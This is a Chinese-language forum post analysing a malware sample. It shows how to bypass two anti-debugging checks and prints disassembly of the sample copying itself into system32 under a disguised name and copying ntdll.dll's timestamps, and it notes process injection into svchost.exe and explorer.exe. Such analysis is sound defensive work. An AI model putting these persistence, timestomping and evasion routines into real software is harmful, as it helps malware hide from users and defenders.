不错的样本。而且又几个反调试。
1.不断查找程序的菜单,窗口项,因为本身是无菜单、窗口的,只有当在OD,WINDBG等调试器中运行时才存在菜单窗口,所有利用这点来进行反调试。不过过这个反调试也不难:- 77DA6BF0 > 8BFF mov edi,edi
- 77DA6BF2 55 push ebp
- 77DA6BF3 8BEC mov ebp,esp
- 77DA6BF5 8B45 08 mov eax,dword ptr ss:[ebp+8]
- 77DA6BF8 85C0 test eax,eax
- 77DA6BFA 0F84 21180000 je advapi32.77DA8421
- 77DA6C00 3D 00000080 cmp eax,80000000
- 77DA6C05 0F84 2AE50100 je advapi32.77DC5135
- 77DA6C0B 3D 01000080 cmp eax,80000001
- 77DA6C10 0F84 1FE50100 je advapi32.77DC5135
- 77DA6C16 3D 02000080 cmp eax,80000002
- 77DA6C1B 0F84 14E50100 je advapi32.77DC5135
- 77DA6C21 3D 04000080 cmp eax,80000004
- 77DA6C26 0F84 09E50100 je advapi32.77DC5135
- 77DA6C2C 3D 50000080 cmp eax,80000050
- 77DA6C31 0F84 FEE40100 je advapi32.77DC5135
- 77DA6C37 3D 60000080 cmp eax,80000060
- 77DA6C3C 0F84 F3E40100 je advapi32.77DC5135
- 77DA6C42 3D 03000080 cmp eax,80000003
- 77DA6C47 0F84 E8E40100 je advapi32.77DC5135
- 77DA6C4D 3D 05000080 cmp eax,80000005
- 77DA6C52 0F84 DDE40100 je advapi32.77DC5135
- 77DA6C58 3D 06000080 cmp eax,80000006
- 77DA6C5D 0F84 D2E40100 je advapi32.77DC5135
- 77DA6C63 A8 01 test al,1
- 77DA6C65 0F85 F6F50200 jnz advapi32.77DD6261 //改NOP
- 77DA6C6B 8D45 08 lea eax,dword ptr ss:[ebp+8]
- 77DA6C6E 50 push eax
- 77DA6C6F E8 04FFFFFF call advapi32.77DA6B78
- 77DA6C74 5D pop ebp
- 77DA6C75 C2 0400 retn 4
复制代码 把上面标出的地方改NOP就行了。修改后就可以继续调试程序了。
2.第二个反调试对现在的OD来说,基本可以忽略不计了:- 00404044 FF15 62564000 call dword ptr ds:[<&KERNEL32.IsDebuggerPres>; kernel32.IsDebuggerPresent
复制代码 把返回的eax修改为0.
再指出楼主的错误。(或许是我理解错了楼主的意思)
C:\WINDOWS\system32\msxslt3.exe该文件其实不是新的文件,而是程序把它本身复制到这个路径而已。
代码如下:- 004010B3 |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C]
- 004010B9 |. 50 push eax ; /String2
- 004010BA |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
- 004010C0 |. 50 push eax ; |String1
- 004010C1 |. FF15 30464000 call dword ptr ds:[404630] ; \lstrcmpiA
- 004010C7 |. 85C0 test eax,eax
- 004010C9 |. 0F84 CA000000 je load.00401199
- 004010CF |. 53 push ebx
- 004010D0 |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C]
- 004010D6 |. 50 push eax ; /FileName
- 004010D7 |. FF15 50464000 call dword ptr ds:[404650] ; \DeleteFileA
- 004010DD |. 57 push edi ; /FailIfExists => FALSE
- 004010DE |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C] ; |
- 004010E4 |. 50 push eax ; |NewFileName
- 004010E5 |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
- 004010EB |. 50 push eax ; |ExistingFileName
- 004010EC |. FF15 6C464000 call dword ptr ds:[40466C] ; \CopyFileA
- 004010F2 |. 6A 24 push 24 ; /FileAttributes = SYSTEM|ARCHIVE
- 004010F4 |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C] ; |
- 004010FA |. 50 push eax ; |FileName
- 004010FB |. FF15 68464000 call dword ptr ds:[404668] ; \SetFileAttributesA
- 00401101 |. 57 push edi ; /hTemplateFile => NULL
- 00401102 |. 57 push edi ; |Attributes => 0
- 00401103 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
- 00401105 |. 57 push edi ; |pSecurity => NULL
- 00401106 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
- 00401108 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
- 0040110D |. 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-11C] ; |
- 00401113 |. 50 push eax ; |FileName
- 00401114 |. FF15 54464000 call dword ptr ds:[404654] ; \CreateFileA
- 0040111A |. 8BD8 mov ebx,eax
- 0040111C |. 83FB FF cmp ebx,-1
- 0040111F |. 74 74 je short load.00401195
- 00401121 |. 56 push esi ; /BufSize => 104 (260.)
- 00401122 |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
- 00401128 |. 50 push eax ; |Buffer
- 00401129 |. FF15 94304000 call dword ptr ds:[403094] ; \GetSystemDirectoryA
- 0040112F |. 68 24314000 push load.00403124 ; /StringToAdd = "\ntdll.dll"
- 00401134 |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
- 0040113A |. 50 push eax ; |ConcatString
- 0040113B |. FF15 A0304000 call dword ptr ds:[4030A0] ; \lstrcatA
- 00401141 |. 57 push edi ; /hTemplateFile => NULL
- 00401142 |. 57 push edi ; |Attributes => 0
- 00401143 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
- 00401145 |. 57 push edi ; |pSecurity => NULL
- 00401146 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
- 00401148 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
- 0040114D |. 8D85 E0FDFFFF lea eax,dword ptr ss:[ebp-220] ; |
- 00401153 |. 50 push eax ; |FileName
- 00401154 |. FF15 54464000 call dword ptr ds:[404654] ; \CreateFileA
- 0040115A |. 8BF0 mov esi,eax
- 0040115C |. 83FE FF cmp esi,-1
- 0040115F |. 74 2D je short load.0040118E
- 00401161 |. 8D45 F0 lea eax,dword ptr ss:[ebp-10]
- 00401164 |. 50 push eax ; /pLastWrite
- 00401165 |. 8D45 E8 lea eax,dword ptr ss:[ebp-18] ; |
- 00401168 |. 50 push eax ; |pLastAccess
- 00401169 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; |
- 0040116C |. 50 push eax ; |pCreationTime
- 0040116D |. 56 push esi ; |hFile
- 0040116E |. FF15 60464000 call dword ptr ds:[404660] ; \GetFileTime
- 00401174 |. 8D45 F0 lea eax,dword ptr ss:[ebp-10]
- 00401177 |. 50 push eax ; /pLastWrite
- 00401178 |. 8D45 E8 lea eax,dword ptr ss:[ebp-18] ; |
- 0040117B |. 50 push eax ; |pLastAccess
- 0040117C |. 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; |
- 0040117F |. 50 push eax ; |pCreationTime
- 00401180 |. 53 push ebx ; |hFile
- 00401181 |. FF15 7C464000 call dword ptr ds:[40467C] ; \SetFileTime
- 00401187 |. 56 push esi ; /hObject
- 00401188 |. FF15 08464000 call dword ptr ds:[404608] ; \CloseHandle
- 0040118E |> 53 push ebx ; /hObject
- 0040118F |. FF15 08464000 call dword ptr ds:[404608] ; \CloseHandle
复制代码 上述代码的意思是:
比较当前运行的路径是否是C:\WINDOWS\system32\msxslt3.exe,若不是,则删除原来存在的该文件,然后复制本身到这个目录,并修改其时间属性与ntdll.dll相同。
最后就是插进程了,所插的进程是svchost.exe和explorer.exe。
[ 本帖最后由 bugman 于 2009-10-2 13:45 编辑 ] |